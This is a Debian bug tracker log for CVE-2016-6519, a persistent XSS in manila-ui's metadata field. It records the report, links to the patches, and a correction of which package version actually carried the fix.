Debian Bug report logs -
#838017
manila-ui: CVE-2016-6519: persistent XSS in metadata field
Reported by: Salvatore Bonaccorso <carnil@debian.org>
Date: Fri, 16 Sep 2016 13:03:07 UTC
Severity: grave
Tags: patch, security, upstream
Found in version manila-ui/2.1.0-2
Fixed in version manila-ui/2.5.1-0
Done: Thomas Goirand <zigo@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#838017; Package src:manila-ui.
(Fri, 16 Sep 2016 13:03:10 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>.
(Fri, 16 Sep 2016 13:03:10 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Source: manila-ui
Version: 2.1.0-2
Severity: grave
Tags: security upstream patch
Hi,
the following vulnerability was published for manila-ui.
CVE-2016-6519[0]:
persistent XSS in metadata field
[1] and [2] contain both patches.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2016-6519
[1] https://bugzilla.redhat.com/show_bug.cgi?id=1375147
[2] https://bugzilla.novell.com/show_bug.cgi?id=988935
Regards,
Salvatore
Reply sent
to Thomas Goirand <zigo@debian.org>:
You have taken responsibility.
(Thu, 06 Oct 2016 17:15:07 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Thu, 06 Oct 2016 17:15:07 GMT) (full text, mbox, link).
Message #10 received at 838017-done@bugs.debian.org (full text, mbox, reply):
This was fixed in version 2.5.0, which I uploaded to Sid.
Information forwarded
to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#838017; Package src:manila-ui.
(Fri, 07 Oct 2016 05:21:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>.
(Fri, 07 Oct 2016 05:21:05 GMT) (full text, mbox, link).
Message #15 received at 838017@bugs.debian.org (full text, mbox, reply):
Control: fixed -1 2.5.1-0
Hi Thomas,
On Thu, Oct 06, 2016 at 05:15:07PM +0000, Debian Bug Tracking System wrote:
> This was fixed in version 2.5.0, which I uploaded to Sid.
That's not true AFAICT, since I did check as well 2.5.0-1 when it was
in experimental and it did not contain the patch. The patch though seems
included in 2.5.1 (wich is now as well in unstable).
Regards,
Salvatore
Marked as fixed in versions manila-ui/2.5.1-0.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 838017-submit@bugs.debian.org.
(Fri, 07 Oct 2016 05:21:05 GMT) (full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Wed, 09 Nov 2016 07:26:56 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 13:46:37 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon